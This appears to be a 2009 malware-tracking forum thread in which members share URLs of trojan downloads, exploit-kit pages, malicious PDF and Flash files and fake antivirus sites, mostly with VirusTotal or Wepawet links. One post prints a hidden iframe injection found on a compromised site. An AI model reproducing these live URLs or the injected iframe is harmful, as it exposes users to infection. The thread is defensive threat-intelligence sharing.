ThreatExpert (http://www.threatexpert.com/report.aspx?md5=9e95cda3645f97fab3235ac21a625a2a)
Title: Re: daily something......
Post by: CkreM on June 16, 2009, 05:30:37 am
Trojans:
Code: [Select]
almasto.net/ins.exe
biggerz.net/ins.exe
Camposceola.com/ins.exe
http://www.virustotal.com/analisis/33c3518f7555aa7b407570e8174133563621629ff2ff8e3c468ffca8da703f3b-1245123021
Code: [Select]
almasto.net/sdfsdf.exe
http://www.virustotal.com/analisis/3e9314888ad11497839781d9a4c9325e36caf86d59bc1ac7ece987e9c56a777b-1245122926
Code: [Select]
friendslinks.com/0/new.exe
http://www.virustotal.com/analisis/68fbe09bcbe4464d9644a57444d9e94f43fd04a2fe42a35ab0f0274cbf14f9ce-1245121971
Code: [Select]
xz.ub9.net/winres.exe
http://www.virustotal.com/analisis/396abb55f933c0df23e78582f5b13738bb799d260618959998f0245c058704f3-1245123148
Code: [Select]
heyjoy.cn/612.exe
http://www.virustotal.com/analisis/652c1cff90096824647b2377b4850fb47f4b6f6abe470eb0114f51d9de86a2a6-1245123263

Exploits:
Code: [Select]
almasto.net/lnk.php?embedded=false
http://wepawet.cs.ucsb.edu/view.php?hash=27262e8c3f678960412e6ecd940ccd3f&t=1245109604&type=js

Fake AV downloader:
Code: [Select]
friendslinks.com/0/loyalbox.exe
http://www.virustotal.com/analisis/776c883badde97f0577d6b11eb759ea9f85302a96d79f4446d3eb4e4399051a0-1245122144
Code: [Select]
porno-tube-xxx.us/loader/index.php?userid=id_0079
http://www.virustotal.com/analisis/26e35006830b010d1d7c97541f1cf960e3b9e8d4d611e5b991132c1634fe92c2-1245122608

Fake AV:
Code: [Select]
you-adult-tube.co.cc/setup.exe
http://www.virustotal.com/analisis/f2dd78517405edeeacc4b06eab567a54e54b9306d18f02ed620a55cb45abbcbd-1245122729

gives koobface related malware links:
Code: [Select]
upr15may.com/ld/gen.php
Title: Re: daily something......
Post by: CM_MWR on June 17, 2009, 12:58:15 pm
FO
Title: Re: daily something......
Post by: CkreM on June 18, 2009, 02:47:14 am
Code: [Select]
yag0yag0.co.cc/index2.php
wepawet seems to fail on this one.
http://jsunpack.jeek.org/dec/go?url=yag0yag0.co.cc_new_index2.php
flash:
Code: [Select]
yag0yag0.co.cc/new/i.swf
http://wepawet.cs.ucsb.edu/view.php?hash=8fdc5af28af58910fedd022b60bd40f2&type=swf
Trojan:
Code: [Select]
yag0yag0.co.cc/new/img.php
http://www.virustotal.com/analisis/40515c53fea41dcbf7aa7342dda135ee981781500d7b9c6750e9204a5f8ce091-1245293368
Title: Re: daily something......
Post by: CkreM on June 18, 2009, 07:02:25 am
Fake AV:
Code: [Select]
ameraif.cn
amayrex.cn
adiosma.cn
ameycva.cn
apauzy.cn
securitytoolsworld.com

K00bface:
Code: [Select]
niceshoot89.com/software/04f456eca8/30000/1/Setup.exe
http://www.virustotal.com/analisis/33ee8d94223dc222cb5a4358f5ab4366dd3c4eeb43d2a7d2a2a3905c4e36cb25-1245307967
Title: Re: daily something......
Post by: CkreM on June 21, 2009, 07:25:00 am
Koobface:
Code: [Select]
nicevideo18.net/software/ea2faf7008/11400/1/Setup.exe
Exploits:
Code: [Select]
adultfex.com/lb/index.php
http://wepawet.iseclab.org/view.php?hash=ffcb0d874f69382bc4e54caf0b450406&t=1245563029&type=js
PDF:
Code: [Select]
adultfex.com/lb/humourAlwaysHumour.pdf
Flash:
Code: [Select]
adultfex.com/lb/usesHumour.swf
Trojan:
Code: [Select]
adultfex.com/lb/update.php
http://www.virustotal.com/analisis/4718ef3d0a751e94ce3a0e20385283d995ee82136e9638892eaf6bbc4795a3e5-1245563087

Trojans:
Code: [Select]
slil.ru/27769294/2fcdca20.4a3e7138/adware_crypt.exe
http://www.virustotal.com/analisis/0a08059aeaa955de3f5d08546f28c83db855d761082c4205811819195e185b04-1245566730
Code: [Select]
freshdownloadcenter.com/install.48232.exe
http://www.virustotal.com/analisis/debf5446d9ed6394fa72bb78f52e4e6ccffe0e4ec8960a3b7c0a2e92a714c369-1245566838
Code: [Select]
www.adult-you-tube.info/downloads/setup.exe
http://www.virustotal.com/analisis/38700a97d35bf78118d3c48d5f37a9150c18d194de58adb43dc6da27942bfc6b-1245567493
Code: [Select]
72.9.108.26/install_10.exe
http://www.virustotal.com/analisis/186ef67fadf42ac6eaee2b5d26a093e9adef6178caa8b42bd3f825405892c4c8-1245567635
Code: [Select]
adwareindependence.com/ppc/f494.exe
http://www.virustotal.com/analisis/b5006cc39bf7a7ff6a1b71c6d9033f67657cffae429ae34bc01b3c2f42ea7157-1245567981

Fake AV (Malware Doctor):
Code: [Select]
adwareindependence.com/scan/mlw.exe
http://www.virustotal.com/analisis/bfc294ae9aa0da8fd65544bdea740fc48b94b1608c7f9d99e6092153dd2029cd-1245567989

Fake payment site:
Code: [Select]
secure.best-internet-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=malwaredoc01&advert=494
malware calls home (receives malware links with the right parameters):
Code: [Select]
softwaresense-search.com/stat.php
Title: Re: daily something......
Post by: CkreM on June 22, 2009, 06:25:46 am
Exploits:
Code: [Select]
sterlate.com
http://wepawet.iseclab.org/view.php?hash=f74e05ee99c0e925663a3451f1d85f34&t=1245570059&type=js
PDF:
Code: [Select]
sterlate.com/cache/readme.pdf
Flash:
Code: [Select]
sterlate.com/cache/flash.swf
(downloaded malware is offline)

Exploits:
Code: [Select]
sterlate.com/sng/index.php
http://wepawet.iseclab.org/view.php?hash=d78519f72f81a626f04873713067717f&t=1245651339&type=js
PDF:
Code: [Select]
sterlate.com/sng/cache/readme.pdf
Flash:
Code: [Select]
sterlate.com/sng/cache/flash.swf
http://wepawet.iseclab.org/view.php?hash=253639a3e73fff185fbd4c489ab0335b&type=swf
Trojan:
Code: [Select]
sterlate.com/sng/load.php?id=5
http://www.virustotal.com/analisis/a8ed3a72616d4d87020d37d7d2b90e2fcc32a5133d535d091970998fe39cd129-1245411696


Exploits (wepawet fails on this one):
Code: [Select]
forum.sc00d.cn/index.php
http://jsunpack.jeek.org/dec/go?url=forum.sc00d.cn_index.php
PDF:
Code: [Select]
forum.sc00d.cn/pdf.php?id=11
Trojan:
Code: [Select]
forum.sc00d.cn/load.php?id=11&spl=4
http://www.virustotal.com/analisis/ff60d4703813e84c5237c95aa0f0c52295945c8f76f03152fa4dd6972e1b3263-1245649899

Trojans:
Code: [Select]
nsmercuryplanet.ru/dast.exe
http://www.virustotal.com/analisis/7d515de9754257b6d5cbc05682bb7d82d2d7c92786f51bb9fecd291f64ad6739-1245649810
Code: [Select]
gold-smerch.cn/flash.exe
http://www.virustotal.com/analisis/140a5961f36bd6a2645f77e74defd8985084f6a6fed6592920aba48eb511ea7d-1245649827

Malware calls home:
Code: [Select]
bytecode.biz/stats/in.php
Title: Re: daily something......
Post by: sparsha on June 22, 2009, 05:21:44 pm
More rogue sites:
Code: [Select]

Internetware-safe.com
Kingpinservers.info
Mal-warexls.net

http://youravprotection.com/support
http://www.registerantivirus.com/
http://www.avprotectionstat.com/index.php
Title: Re: daily something......
Post by: sursmurf on June 24, 2009, 12:59:35 pm
Code: [Select]
hXXp://ribboninn.com/djellow.exe
[VT 5/41]
http://www.virustotal.com/sv/analisis/3a93b168267d7ddc8c034303b817e0ea297a000df40761bb7f5a79faa68bb295-1245847100 (http://www.virustotal.com/sv/analisis/3a93b168267d7ddc8c034303b817e0ea297a000df40761bb7f5a79faa68bb295-1245847100)
Title: Re: daily something......
Post by: sursmurf on June 24, 2009, 07:10:58 pm
Another site, same file as above

Code: [Select]
http://76380.webhosting29.1blu.de/djellow.exe
Title: Re: daily something......
Post by: sursmurf on June 25, 2009, 10:16:34 am
New binary and URL

Code: [Select]
http://www.hzcpwl.cn/djellow.exe
[VT 6/41]
http://www.virustotal.com/sv/analisis/2b27e47c7f8d2195d5473d400a1e4ccec79049c6d84203e27003e5e2daaa95b7-1245924902 (http://www.virustotal.com/sv/analisis/2b27e47c7f8d2195d5473d400a1e4ccec79049c6d84203e27003e5e2daaa95b7-1245924902)
Title: Re: daily something......
Post by: sursmurf on June 25, 2009, 11:43:53 am
Code: [Select]
http://transein.com/_test_01-07/getexe.php
[VT 5/41]
http://www.virustotal.com/sv/analisis/7d168c70d66f83b9876c31227af4e595b5d40ea03df6a624f8669c2cddb9661f-1245929271 (http://www.virustotal.com/sv/analisis/7d168c70d66f83b9876c31227af4e595b5d40ea03df6a624f8669c2cddb9661f-1245929271)
Title: Re: daily something......
Post by: sursmurf on June 25, 2009, 03:06:44 pm
Code: [Select]
http://213.182.197.42/load.php
[VT 10/41]
http://www.virustotal.com/sv/analisis/2cc7714f5b1d89fd90aa73df48f1770f1e7222553fe1955542ca82194f114d18-1245941662 (http://www.virustotal.com/sv/analisis/2cc7714f5b1d89fd90aa73df48f1770f1e7222553fe1955542ca82194f114d18-1245941662)

PDF
Code: [Select]
http://213.182.197.42/pdf.php
[VT 10/41]
http://www.virustotal.com/sv/analisis/0ce86e1f37aa5fd6651a2d40bf9b3c3d9dce6859a4fabf0e72fdff2de42a1f1d-1245941687 (http://www.virustotal.com/sv/analisis/0ce86e1f37aa5fd6651a2d40bf9b3c3d9dce6859a4fabf0e72fdff2de42a1f1d-1245941687)

Flash
Code: [Select]
http://213.182.197.42/swf.php
[VT 9/41]
http://www.virustotal.com/sv/analisis/ff04bb1c9f9b2d20ec22cabbd6c7d6e382762961080440a9418731a4b05be15d-1245941702 (http://www.virustotal.com/sv/analisis/ff04bb1c9f9b2d20ec22cabbd6c7d6e382762961080440a9418731a4b05be15d-1245941702)
Title: Re: daily something......
Post by: CkreM on June 26, 2009, 03:19:34 am
Trojans:
Code: [Select]
satanic.easycoding.org/file.exe
http://www.virustotal.com/analisis/eb70c986ee061898ce2c23e2b37a92a65458f0744aebe2e4e7838a70023cafec-1245985908
Code: [Select]
keule557.cn/2.exe
http://www.virustotal.com/analisis/0bb0fab4f476de542bcae7b8338793e705d4bbaad2511210e94958784e45aec3-1245985956
Code: [Select]
keule557.cn/805.exe
http://www.virustotal.com/analisis/d1ab115a3b62876adcbd571be2be685e1af1672f506b8a084e52308fc5dbdcd9-1245985980
Code: [Select]
usrvnu.ru/infect.php
http://www.virustotal.com/analisis/b7b4f921db11b06919834a8f8b2c96efabe8d6919da067ea011d736e37c2187e-1245986114
Code: [Select]
roons.cn/ded/Project2.exe
http://www.virustotal.com/analisis/d07e34d88fa067fe1d942670df0dad29e555fd5841a19f46d47dd56f50f74be5-1245986217

Trojan Pinch:
Code: [Select]
woons.cn/pinch_no_cript.exe
Title: Re: daily something......
Post by: sursmurf on June 26, 2009, 12:55:17 pm
zbot
Code: [Select]
http://javiercubel.com/statement_45365352.exe
[VT 9/41]
http://www.virustotal.com/sv/analisis/046d3796c3dc4620f2c54c6439f11a5f4dd3faf4d513ed0dcb9f640780009022-1246020252 (http://www.virustotal.com/sv/analisis/046d3796c3dc4620f2c54c6439f11a5f4dd3faf4d513ed0dcb9f640780009022-1246020252)
Title: Re: daily something......
Post by: sursmurf on June 26, 2009, 08:37:13 pm
Zbot
Code: [Select]
http://update.microsoft.com.hillij.com/microsoftofficeupdate/isapdl/default.aspx/officexp-KB910721-FullFile-ENU.exe
[VT 13/41]
http://www.virustotal.com/sv/analisis/b6c9a2125a43133d681be0e27aac281f404e29b5e6f031d04a789ff6f0bc8218-1246048421 (http://www.virustotal.com/sv/analisis/b6c9a2125a43133d681be0e27aac281f404e29b5e6f031d04a789ff6f0bc8218-1246048421)
Title: Re: daily something......
Post by: cjeremy on June 27, 2009, 02:13:49 am
PSW Trojan Fun:

Code: [Select]
http://winddk.ch.ma/dd.txt
Leads to:
Code: [Select]
http://ztb.cztv.tv/360/1.exe
http://ztb.cztv.tv/360/2.exe
http://ztb.cztv.tv/360/7.exe
http://ztb.cztv.tv/360/88.exe
http://ztb.cztv.tv/360/9.exe

Been a while since I visited.  Hope all is well with everyone! ;)
Title: Re: daily something......
Post by: sursmurf on June 28, 2009, 01:54:53 pm
Code: [Select]
http://artmarket.or.kr/ecard.exe
[VT 6/41]
http://www.virustotal.com/sv/analisis/89e12bf34116897c63b6e1a98a328e16222f33dab4b2aee2400c60aa3e7a1aaf-1246197175 (http://www.virustotal.com/sv/analisis/89e12bf34116897c63b6e1a98a328e16222f33dab4b2aee2400c60aa3e7a1aaf-1246197175)
Title: Re: daily something......
Post by: Malware-Web-Threats on June 28, 2009, 06:07:17 pm
195.190.13.106 / Cutwail

Code: [Select]
hxxp://109438129432.cn/load.php
VirusTotal (http://www.virustotal.com/analisis/a1275ed1572e9eed052ebbcadaec941df6b0fccac2990a993ad32227bbc1ca4b-1244801070) - 23/40 (57.50%)
Code: [Select]
hxxp://234273849543.cn/load.php
VirusTotal (http://www.virustotal.com/analisis/a1275ed1572e9eed052ebbcadaec941df6b0fccac2990a993ad32227bbc1ca4b-1244801070) - 23/40 (57.50%)
Code: [Select]
hxxp://438723847234.cn/load.php
VirusTotal (http://www.virustotal.com/analisis/ce5ce251673ad3b9a00a8d3e3216d0435802c072f3e3460f9046c015a8eac075-1245938186) - 12/41 (29.27%)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=c05177060951769a260d29186dd978e2)

--
61.235.123.140
exploits / trojan

Code: [Select]
hxxp://witsibux.cn/hi/index.php
hxxp://witsibux.cn/hi/update.php
hxxp://witsibux.cn/hi/belowNotH.pdf
hxxp://witsibux.cn/hi/humourOf.swf
Wepawet (http://wepawet.iseclab.org/view.php?hash=a284924f3529a5d4d08b4e09a2453194&t=1246209781&type=js)
VirusTotal (http://www.virustotal.com/analisis/14d44d74e33ce1caeaf523632c346ec70b86767dec196b5d66ef87b77b08bde4-1246209825) - 2/41 (4.88%)
Title: Re: daily something......
Post by: cjeremy on June 28, 2009, 07:26:06 pm
Some more fun:

Code: [Select]
http://mm.cj-vv.cn:8888/mm/lm/new1.exe
http://mm.cj-vv.cn:8888/mm/lm/new2.exe
http://mm.cj-vv.cn:8888/mm/lm/new4.exe
http://mm.cj-vv.cn:8888/mm/lm/new6.exe
http://mm.cj-vv.cn:8888/mm/lm/new7.exe
http://mm.cj-vv.cn:8888/mm/lm/new8.exe
http://mm.cj-vv.cn:8888/mm/lm/new9.exe
http://mm.cj-vv.cn:8888/mm/lm/new10.exe
http://mm.cj-vv.cn:8888/mm/lm/new11.exe
http://mm.cj-vv.cn:8888/mm/lm/new12.exe
http://mm.cj-vv.cn:8888/mm/lm/new14.exe
http://mm.cj-vv.cn:8888/mm/lm/new15.exe
http://mm.cj-vv.cn:8888/mm/lm/new16.exe
http://mm.cj-vv.cn:8888/mm/lm/new17.exe
http://mm.cj-vv.cn:8888/mm/lm/new20.exe
http://mm.cj-vv.cn:8888/mm/lm/new21.exe
http://mm.cj-vv.cn:8888/mm/lm/new23.exe
http://mm.cj-vv.cn:8888/mm/lm/new24.exe
http://mm.cj-vv.cn:8888/mm/lm/new25.exe
http://mm.cj-vv.cn:8888/mm/lm/new26.exe
http://mm.cj-vv.cn:8888/mm/jx/new3.exe
http://mm.cj-vv.cn:8888/mm/jx/new4.exe
http://mm.cj-vv.cn:8888/mm/jx/new5.exe
http://mm.cj-vv.cn:8888/mm/jx/new6.exe
http://mm.cj-vv.cn:8888/mm/jx/new7.exe
http://mm.cj-vv.cn:8888/mm/jx/new8.exe
http://mm.cj-vv.cn:8888/mm/jx/new11.exe
http://mm.cj-vv.cn:8888/mm/jx/new12.exe
http://mm.cj-vv.cn:8888/mm/jx/new13.exe

Title: Re: daily something......
Post by: PaJamis on June 28, 2009, 09:54:04 pm
Quote
hxxp://dcvs.chc.edu.tw/classfix/default.asp (Mal/Iframe-I)
Title: Re: daily something......
Post by: MysteryFCM on June 28, 2009, 10:04:31 pm
Can you double check that one please? (hostname is failing to resolve from several locations over here)
Title: Re: daily something......
Post by: promised on June 29, 2009, 12:12:11 pm
Code: [Select]
liesbethmilan.be/1/captcha6.exe
liesbethmilan.be/1/ms.19.exe
Title: Re: daily something......
Post by: CM_MWR on June 29, 2009, 01:32:28 pm
FO
Title: Re: daily something......
Post by: philipp on June 29, 2009, 02:17:24 pm
Quote
Can you double check that one please? (hostname is failing to resolve from several locations over here)

Add a www to it or google the domain name, but there is more than just that one and I can't see where any exploits popped out.   ???

After the closing html tag, I see the following:
Code: [Select]
<iframe src=http://www.3prince.com/kmdr/guest/images/_vti_cnf/tt/rp.htm width=30 height=0><div style="position: absolute; top: -999px;left: -999px;">
��������:
<a href="http://www.kryiyi.com">����һ��˽���l��վ</a>
<a href="http://www.61hj.com">Ӣ�ۺϓ�˽���l��վ</a>
<a href="http://www.reeltop.com">�ڿͽ��׾W</a>
<a href="http://www.941fc.com">����Ҫ�l??Ӱ�W</a>
<a href="http://www.ddoscc.cn">DDOS������,CC������˽�����������W�ɹ�����</a>
<a href="http://www.10004y.cn">�@���ӵ�˽��</a>
<a href="http://www.gfsj.org.cn">��������˽��</a>
<a href="http://www.3ky.org.cn">DDOS����?����DDOS���Rԭ����DDOS��������������ddos��������IP������</a>
<a href="http://1104f.cn">�@���ӵ�</a>
</div>

The iframed URL returns HTTP status code 404. I guess this is where the exploits came from.

Most of the hosts resolve to 61.160.213.47, except for
w ww.941fc.com (NXDOMAIN)
w ww.ddoscc.cn (CNAME url.xundns.net -> 120.72.34.251)
w ww.10004y.cn (58.252.208.172)

w ww.ddoscc.cn returns:
Code: [Select]
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2009 13:53:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCATCSDAA=DAOPAKFAOJEIFGHFMGKLFDLD; path=/
Cache-control: private


<meta http-equiv="refresh" content="0;url=http://ddoscc.cn">
ddoscc.cn again resolves to 61.160.213.47.

Trying to access these hosts on 61.160.213.47 always ends with the connection being interrupted/reset by the server.

w ww.10004y.cn does not contain anything malicious from a quick look.
Title: Re: daily something......
Post by: CkreM on June 30, 2009, 08:33:11 am
Pinch:
Code: [Select]
turbina.net/modules/w/load/exec.php
http://www.virustotal.com/analisis/2cb4599b35deaacebdb1746918564ace0ebb0560e0fc7d7e9e14703bcd8590ea-1246346258

Emold:
Code: [Select]
nat77.biz/123.exe
http://www.virustotal.com/analisis/1b379fc266bf6ea59a945d77b54a4945c39012020739e90a621d8c21a6b4c62a-1246348304
Code: [Select]
iframecash.net/cache/bin/main.exe
http://www.virustotal.com/analisis/9fcdcd460db594f5143457b2c52acbe509fb2abefb713e77f2d91e0184aa8888-1246348532

Fake AV:
Code: [Select]
pornotube915.com/scan
Trojans:
Code: [Select]
hzone66.cn/preloader_9.exe
http://www.virustotal.com/analisis/beb6f3ed69235697bcbc018198fb0228d683da9a9a2943984b3b3ba7431b328d-1246333025
Code: [Select]
niph-kosova.org/server3.exe
http://www.virustotal.com/analisis/a5fd40f7a8c7686f68ead6219ed842e129f6200c70cb4d5e61d1f8de35cf5d5c-1246346783
Code: [Select]
91.189.113.210/t.exe
http://www.virustotal.com/analisis/4452581e37cb7aedcfc68d937988785cd6d55a938f267b4beb87f1227cbb2db3-1246347754
Code: [Select]
79.174.64.36/ldr.exe
http://www.virustotal.com/analisis/05cdd3f1b6a8a8ba47391b5506ef1fbddd361f85bf24d54887c48eae2eb28cba-1246347842
Code: [Select]
casinousa.cn/lsass.exe
http://www.virustotal.com/analisis/324b639b727842e2b6854915ea7cc5018fba336386a9773720e4520abb701751-1246347934
Code: [Select]
winsofter.ru/out.exe
http://www.virustotal.com/analisis/14bd1b39cc6c4e23ce4a2ebc5e94676e850e0a91caf03af8d1ab3e6dcc9377c7-1246348063
Code: [Select]
missing-codecs.net/download/install_flash_player.exe
http://www.virustotal.com/analisis/c90303b43ad53fb5a223a72d13256bf9175cd63013053ce5f4de4de4a8eaef0c-1246350478

Exploits (wepawet and jsunpack fail on this):
Code: [Select]
svazkusavip.com/counter/index.php
PDF:
Code: [Select]
svazkusavip.com/counter/dummyButAre.pdf
Flash:
Code: [Select]
svazkusavip.com/counter/alwaysWord.swf
Trojan (downloader):
Code: [Select]
svazkusavip.com/counter/update.php
http://www.virustotal.com/analisis/ddc27e9df2e8cdae43d75c5a1db53b1876a47c219000d5735460496b5298c1a8-1246347509

Exploits (wepawet fails on this one):
Code: [Select]
nah77.biz/myy/index.php
http://jsunpack.jeek.org/dec/go?url=nah77.biz_myy_index.php
PDF:
Code: [Select]
nah77.biz/myy/pdf.php
Trojan (Emold):
Code: [Select]
nah77.biz/myy/load.php
http://www.virustotal.com/analisis/5b2536fccffdcbaf1d6538e01f34cde8ce104b1bced4cc42d1b64d554283698f-1246349005

Exploits (wepawet and jsunpack fail on this):
Code: [Select]
imagehut5.cn/index.php
PDF:
Code: [Select]
imagehut5.cn/pdf.php?id=2
Trojan:
Code: [Select]
imagehut5.cn/load.php?id=2
http://www.virustotal.com/analisis/301a24d763c36477cfc192c27b95c83a4801f75f98f0f7c2a5fe86973e9d4422-1246349595

Trojan downloaded by the above (changes tcpip.sys):
Code: [Select]
85.114.141.207/EvID4226Patch.exe
http://www.virustotal.com/analisis/0d78fc5700892aee90cd409716b2f6e1a844da5e85e563eaac631a58d8d0edc2-1246349673
Title: Re: daily something......
Post by: promised on July 01, 2009, 04:25:05 am
Quote
2:http://mmdeai.3322.org/atievx.exe
2:http://milllk.com/wm/svchost.exe
2:http://havvvha.com/xiao/aa1.exe
2:http://havvvha.com/xiao/aa2.exe
2:http://havvvha.com/xiao/aa3.exe
2:http://havvvha.com/xiao/aa4.exe
1:http://havvvha.com/xiao/aa5.exe
2:http://havvvha.com/xiao/aa6.exe
2:http://havvvha.com/xiao/aa7.exe
2:http://havvvha.com/xiao/aa8.exe
2:http://havvvha.com/xiao/aa9.exe
2:http://havvvha.com/xiao/aa10.exe
2:http://havvvha.com/xiao/aa11.exe
2:http://havvvha.com/xiao/aa12.exe
2:http://havvvha.com/xiao/aa13.exe
2:http://havvvha.com/xiao/aa14.exe
2:http://havvvha.com/xiao/aa15.exe
2:http://havvvha.com/xiao/aa16.exe
2:http://havvvha.com/xiao/aa17.exe
2:http://havvvha.com/xiao/aa18.exe
2:http://havvvha.com/xiao/aa19.exe
2:http://havvvha.com/xiao/aa20.exe
2:http://havvvha.com/xiao/aa21.exe
2:http://havvvha.com/xiao/aa22.exe
2:http://havvvha.com/xiao/aa23.exe
2:http://havvvha.com/xiao/aa24.exe
2:http://havvvha.com/xiao/aa25.exe
2:http://havvvha.com/xiao/aa26.exe
2:http://havvvha.com/xiao/aa27.exe
2:http://havvvha.com/xiao/aa28.exe
2:http://havvvha.com/xiao/aa29.exe
2:http://havvvha.com/xiao/aa30.exe
2:http://havvvha.com/xiao/aa31.exe
2:http://havvvha.com/xiao/aa32.exe
2:http://havvvha.com/xiao/aa33.exe
2:http://havvvha.com/xiao/aa34.exe
2:http://havvvha.com/xiao/aa35.exe
2:http://havvvha.com/xiao/aa36.exe
2:http://havvvha.com/xiao/1.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 04:40:56 am
Code: [Select]
121.12.115.11:886/cao/aa1.exe
121.12.115.11:886/cao/aa2.exe
121.12.115.11:886/cao/aa3.exe
121.12.115.11:886/cao/aa4.exe
121.12.115.11:886/cao/aa5.exe
121.12.115.11:886/cao/aa6.exe
121.12.115.11:886/cao/aa7.exe
121.12.115.11:886/cao/aa8.exe
121.12.115.11:886/cao/aa9.exe
121.12.115.11:886/cao/aa10.exe
121.12.115.11:886/cao/aa11.exe
121.12.115.11:886/cao/aa12.exe
121.12.115.11:886/cao/aa13.exe
121.12.115.11:886/cao/aa14.exe
121.12.115.11:886/cao/aa15.exe
121.12.115.11:886/cao/aa16.exe
121.12.115.11:886/cao/aa17.exe
121.12.115.11:886/cao/aa18.exe
121.12.115.11:886/cao/aa19.exe
121.12.115.11:886/cao/aa20.exe
121.12.115.11:886/cao/aa21.exe
121.12.115.11:886/cao/aa23.exe
121.12.115.11:886/cao/aa25.exe
121.12.115.11:886/cao/aa26.exe
121.12.115.11:886/cao/aa27.exe
121.12.115.11:886/cao/aa28.exe
121.12.115.11:886/cao/ms.exe
x9s7b.cn:8808/a/lzz.css
x9s7b.cn:8808/a/ms.css
x9s7b.cn:8808/a/real11.css
Title: Re: daily something......
Post by: CkreM on July 01, 2009, 06:15:23 am
Fake AV:
Code: [Select]
pornotube914.com/scan
atoylev.cn/?wm=70321
Title: Re: daily something......
Post by: promised on July 01, 2009, 07:02:53 am
Code: [Select]
mvt.c4.fr/a.css
mavr-best.com/ldr/bot.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 09:15:04 am
Quote
pornotube915.com/codec/.exe
74.52.164.210/pk/bb090621.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 09:27:46 am
Code: [Select]
megavipsite.cn/av/iframe/socks.exe
l3world.ru/l2.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 01:45:14 pm
Quote
freett.com/950065/guama.exe
freett.com/950065/cq.exe
freett.com/950065/arp.exe
freett.com/950065/qn3.exe
freett.com/950065/pt.exe
freett.com/950065/hb1.exe
xoomer.alice.it/email02/bom.jpg
hxxp://www.fanv.cn/d.exe
hxxp://www.fei4.cn/aa.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 02:34:15 pm
Quote
hxxp://x.b76.net/winres.exe
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=1&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://bewfsnfwka.net/uniq.php?id=1883789557&p=0
hxxp://bgukeumzwz.net/ccsuper1.php
hxxp://bgukeumzwz.net/ccsuper0.php
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=
hxxp://click0617.winrar2009.cn:88/files/click.jpg
hxxp://bgukeumzwz.net/ccsuper2.php
hxxp://www.51.la/?002941498
hxxp://heyjoy.cn/612.exe
hxxp://img.users.51.la/2941498.asp
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=2&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://www.51.la/?2941498
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=3&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://ppc0617.winrar2009.cn:88/d.txt
hxxp://bgukeumzwz.net/ccsuper3.php
Title: Re: daily something......
Post by: promised on July 02, 2009, 03:21:11 pm
Quote
hxxp://www.area03601.com/components/k.exe
hxxp://www.area03601.com/components/w.exe
iarc.er-robotics.org/images/wingb.dll
iarc.er-robotics.org/images/gbtext.dll
hxxp://www.toncom.net/images/indexn.gif
lawd.poloi999.cn/down/dnf9m.exe
lawd.poloi999.cn/down/tl9m.exe
lawd.poloi999.cn/down/mhxu9m.exe
lawd.poloi999.cn/down/mhxu9m1.exe
lawd.poloi999.cn/down/qq3g9m.exe
lawd.poloi999.cn/down/qq3g9m1.exe
lawd.poloi999.cn/down/wmgj9m.exe
lawd.poloi999.cn/down/zx9m.exe
lawd.poloi999.cn/down/wd9m.exe
lawd.poloi999.cn/down/dh29m.exe
lawd.poloi999.cn/down/qqhx9m.exe
lawd.poloi999.cn/down/mu9m.exe
lawd.poloi999.cn/down/zt9m.exe
lawd.poloi999.cn/down/cqsj9m.exe
lawd.poloi999.cn/down/dj9m.exe
lawd.poloi999.cn/down/wl9m.exe
lawd.poloi999.cn/down/jxsj9m.exe
lawd.poloi999.cn/down/xc9m.exe
lawd.poloi999.cn/down/tx29m.exe
lawd.poloi999.cn/down/zu9m.exe
lawd.poloi999.cn/down/dh39m.exe
lawd.poloi999.cn/down/hx29m.exe
lawd.poloi999.cn/down/dhwd9m.exe
lawd.poloi999.cn/down/zzh9m.exe
lawd.poloi999.cn/down/jr9m.exe
lawd.poloi999.cn/down/cp9m.exe
lawd.poloi999.cn/down/kx9m.exe
lawd.poloi999.cn/down/cqwd9m.exe
lawd.poloi999.cn/down/rxjh9m.exe
lawd.poloi999.cn/down/CJSH9M.exe
lawd.poloi999.cn/down/WZSJ9M.exe
lawd.poloi999.cn/down/aion9m.exe
lawd.poloi999.cn/down/qqmo.exe
lawd.poloi999.cn/down/qqma1.exe
ssl1899.websiteseguro.com/box10/errors.exe
ssl1899.websiteseguro.com/box10/3.exe
up.cj-vv.cn:889/up1/up.exe
Title: Re: daily something......
Post by: sparsha on July 03, 2009, 02:14:20 pm
Code: [Select]
http://securitybestonline.com/hitin.php?land=20&affid=21300
http://netsecurityweb.com/hitin.php?land=20&affid=20100
http://goscanany.com/?uid=13005
http://av-scan-64.com/?id=48040

http://therealsecurityshields.com/page.php?id=73
http://6-tube-world.com/xplaymovie.php?id=40012

http://downloadfixandlove1.com/file.exe
http://downloadfixandlove.com/pcdef.exe

http://video-tube.cn/tds3/in.cgi?5
http://green-tube-site.com/xplaymovie.php?id=45095

http://exedoc.com/TubeViewer.ver.6.48022.exe
http://exedoc.com/av-scanner.48040.exe

http://theexe.com/streamviewer.45059.exe
Title: Re: daily something......
Post by: sparsha on July 11, 2009, 11:21:01 am
"PC Security 2009"

braviax/brastk advertised rogue
Code: [Select]
http://pcsecurity2009.com/
Kuxx.info
http://pcsecassal.com/1/installer/Installer2.exe
http://pcsecureredirect2.com/?wmid=1025&d=1&it=2&s=1
pcsecurity-2009.com
Title: Re: daily something......
Post by: sparsha on July 13, 2009, 10:36:56 am
Rogue related sites:
Code: [Select]
http://Anti-virus-best.com
http://anti-virus-best.info/install.php
http://download.anti-virus-best.info/dl/PreInstaller.exe

http://Sprut-cluster.info
